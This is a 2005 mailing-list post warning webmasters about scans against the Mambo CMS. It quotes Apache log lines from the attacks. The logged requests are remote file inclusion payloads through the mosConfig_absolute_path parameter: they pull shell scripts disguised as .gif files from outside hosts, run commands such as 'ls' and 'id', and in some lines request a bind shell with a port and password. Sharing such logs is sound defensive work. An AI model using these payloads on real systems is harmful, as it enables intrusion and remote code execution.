Saludos:
some webmasters might be interested in this in the future, if they are using
mambo.
i just picked up this log from apache (i don;t run Mambo, so i think its a
scanner - scans for Mambo that i supose it's running on a server with
register_globals enabled)
Yes, its a complex bug y very serius.
My list:
250-43-223-201.adsl.terra.cl - - [24/Nov/2005:15:43:36 -0500] "GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://usuarios.lycos.es/pepebenjabenja/shell.gif?&cmd=ls
HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows; U; Win98; es-AR; rv:1.7.7)
Gecko/20050414 Firefox/1.0.3"
202.226.224.67 - - [24/Nov/2005:11:58:15 -0500] "GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/shooter1resource/newcmd.gif?&cmd=id
HTTP/1.0" 200 45 "-" "DataCha0s/2.0"
210.213.138.53.pldt.net - - [23/Nov/2005:05:56:21 -0500] "GET
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://river.com.ru
HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US;
rv:1.7.6) Gecko/20050225 Firefox/1.0.1"
a15172245.alturo-server.de - - [22/Nov/2005:23:25:47 -0500] "POST
/index.php?option=com_content&task=view&id=2737&Itemid=64/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.river.com.ru&port=23123&bind_pass=synchr0matic&use=Perl
HTTP/1.0" 200 45 "-" "Mozilla/4.0"
a15172245.alturo-server.de - - [22/Nov/2005:23:13:03 -0500] "POST
/index.php?option=com_content&task=view&id=3865&Itemid=56/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.river.com.ru&port=32012&bind_pass=synchr0matic&use=C
HTTP/1.0" 200 45 "-" "Mozilla/4.0"
etc, etc etc.
ATte:
--
Alonso Caballero Quezada aka ReYDeS - ReYDeS@gmail.com
http://alonsocaballero.informatizate.net - LRU # 307242
http://www.SWP-scene.org -
http://www.RareGaZz.net - h
